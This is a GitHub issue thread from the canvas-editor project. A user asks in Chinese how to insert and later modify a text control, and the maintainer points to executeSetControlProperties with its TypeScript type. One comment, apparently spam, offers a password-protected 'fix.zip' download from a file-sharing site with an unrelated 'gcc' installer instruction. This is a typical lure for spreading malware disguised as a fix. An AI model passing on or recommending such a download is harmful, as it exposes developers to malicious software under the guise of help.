### ISSUE TITLE
文本如何修改？

### ISSUE THREAD

**Issue by bettersoft123** [Hufe921/canvas-editor#790]
### What problem does this feature solve?

  想在下拉列表前面增加个文本标题,不想用inserttitle方式.
 1: instance.command.executeInsertElementList([
              {
                type: ElementType.TEXT  ,
                value: value, 
                id: generateGUID(),                
                control: {
                  type : 'text',
                  conceptId: generateGUID(),
                  code: eleId,
                  placeholder: value,
                  deletable: deletable ,
                  value: value ,
                  extension: recordElementOtherProperties(elementData)
                }
              }
            ])
  用executeUpdateElementById源码中没有对text类型的支持
  用executeSetControlProperties ，没有controlId,插入的时候也没法在第一层赋值controlId。
  请指导下。
2:做修改的时候，入参properties ，也是插入时候的入参一样的格式吗？

### What does the proposed API look like?

如上.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hufe921** [comment]
executeSetControlProperties 支持使用控件内部id或conceptId进行属性修改。
编辑器有完整的ts类型定义，建议合理使用代码编辑器的代码提示功能。
```ts
export type ISetControlProperties = {
  id?: string
  conceptId?: string
  properties: Partial<Omit<IControl, 'value'>>
}
```
